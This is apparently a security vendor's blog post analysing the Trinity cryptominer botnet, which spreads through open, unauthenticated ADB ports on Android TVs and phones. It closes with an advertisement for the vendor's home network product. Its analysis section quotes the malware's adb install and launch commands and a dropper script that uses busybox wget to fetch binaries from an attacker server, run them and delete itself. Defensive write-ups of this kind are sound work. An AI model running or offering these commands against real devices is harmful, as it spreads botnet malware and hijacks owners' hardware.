Trinity Miner using open ADB port to target IoT devices

In the 21st century, life is becoming smart and evolving at a fast pace. Even day to day gadgets are becoming smarter. All these IoT devices are powered by ARM-based processor and run on android and unix operating system. These IoT devices include mobiles, smart T.V., routers, IP cameras and DVR. This is one major reason for cyber criminals to shift their attention towards IoT devices, which is also a trend that has been observed in the statistic of attacks on Quick Heals’ honeypot.

Fig. 1 Attacker locations on our honeypot

Internet of things ensures continuous internet connection, which makes these devices publicly visible on the internet. Many smart TV manufactures sell smart TV’s with uncertified version of android with adb port open. Even on android smartphone this port is kept open by default by some manufacturers. In addition, many a times users make debugging enabled for sideloading apps like Netflix and Hotstar on these smart TV’s and mobile phones. This port requires no authentication to target any device. Using this port, attacker can take complete access of android device including its webcam, app installation etc.

Quick Heal has found three most trending types of attacks on IoT devices :
1.DNS related attacks on routers
2.Peer to peer android miners
3.Mirai botnet.

These attacks result in high processor consumption, which results in crashing these IoT devices, which in turn get used as a bot to target other devices from LAN and WAN.

Fig. 2 Oneplus 5 with ADB port open on public IP address

Your Android devices can get attacked in three ways from the internet even without user’s interaction:
1.Attack on static public IP
2.Attack within WAN
3.Attack within LAN


Fig. 3 Attacker attacking Android devices with public IP

Fig. 4 Infected device attacking Android devices with public IP

Attack Scenario:
Normally in-home or enterprises, the internet is provided by Internet Service Providers, so we get one local IP from these ISP, so all users of one ISP are inter-connected. In general, all these users share the same public IP and different local IP by ISP. But some enterprises get dedicated static public IP address by which all their devices are directly accessible on the public internet. So, the attackers keep scanning devices whose ADB port is open on public IP from all around the world. Then this infected device infects all devices connected within the home and starts infecting devices present in neighbour’s home by just using a similar mechanism as used by torrents i.e. p2p.

Analysis of Trinity Botnet:


Fig. 5 Malware commands executed for p2p

Quick heal researcher has observed trinity miner which targeted our honeypot thrice a day by different IP’s. This miner has unique features; it uses ADB as the entrance to the system and executes miner and then scans devices connected in a network.
Elf file contains the spreader module. This elf is targeted for ARM-based processor. This elf first checks if UFO miner and trinity is running or not.

iRunningStatus = fun_CheckIfProcessIsInExecution(
(int)”com.ufo.miner”) != 0;

Within “fun_CheckIfProcessIsInExecution” it executes “ps grep packagename” command, if ufo miner is not in running state then it installs ufo.apk and trinity. To execute miner it uses

adb -s i.p:5555 shell \”am start -n packagename\

for installation of package using ADB it executes
adb -s %s:5555 install ufo.apk

Once the device is infected by ufo miner and trinity, it starts checking devices connected in a network. Once device with ADB port found, it checks if it’s already infected or not. If it’s infected, then it pushes all files to a given device and executes all commands. In fact, they don’t even need any authentication for this type of attack.
Interestingly, the attacker is not doing anything for persistence, but as the current bot is creating multiple bots so even if this binary is stopped in the current device then other devices will execute miner again in this device. In ufo.apk miner it uses Web View exploit using which it executes mining code written in JavaScript.
Also, ADB is accessible without any credential so an attacker can enter into the device at his own will and can deploy or get any file using it.

Fig. 6 Attacker’s command execution on our honeypot

Use of Genuine tools:
Once device access is gained, attacker deploys shell scripts. It drops following tools into the system if not present busybox, wget, and curl, which provides extended support for executing commands. Then it executes shell script file into these devices like below.

cd /data/local/tmp/putin/ && busybox wget && chmod 777 && sh

n="arm arm7 mips mpsl x86"

for i in $n
cp /system/bin/sh $i
busybox wget https://$http_server/main/$i -O -> $i
chmod 777 $i
./$i android.$i
rm -rf $i
rm $0

It’s easy to evade detection in this way, as links can change frequently. They drop various malware frequently by executing shell scripts like Mirai, spyware, etc.

Quick Heal Home Security (QHHS) ->
Quick Heal has recently launched Quick Heal Home Network Security (QHHS), a secured Wi-Fi solution to protect all your connected smart home devices from cyber-attacks. It includes firewall, URL security, IDS/IPS engine to fight against increasing attack on home network devices. Quick Heal Home Security efficiently blocks traffic coming from public network to your smart device. It only allows traffic initiated from our product and all other traffic is blocked immediately. It also contains real-time URL blocking support and to protect against peer to peer attack for mobiles and laptops it uses IDS/IPS engine,which contains real-time signature for Mitre attacks and the latest CVE’s.

Fig. 7 Home after HNS security

It provides complete security for all the IoT devices. It also protects against DNS attack using DNS-sec feature, which is pretty much common nowadays. It also contains signature for Mirai and android malware.
As shown in the above pic it provides isolation among guest users and trusted users which make it more secure if the already infected user also comes into our network.


Attacker IP’s:


Subject Matter Expert:
Vallabh Chole

Vallabh Chole

Vallabh Chole

No Comments, Be The First!

Your email address will not be published.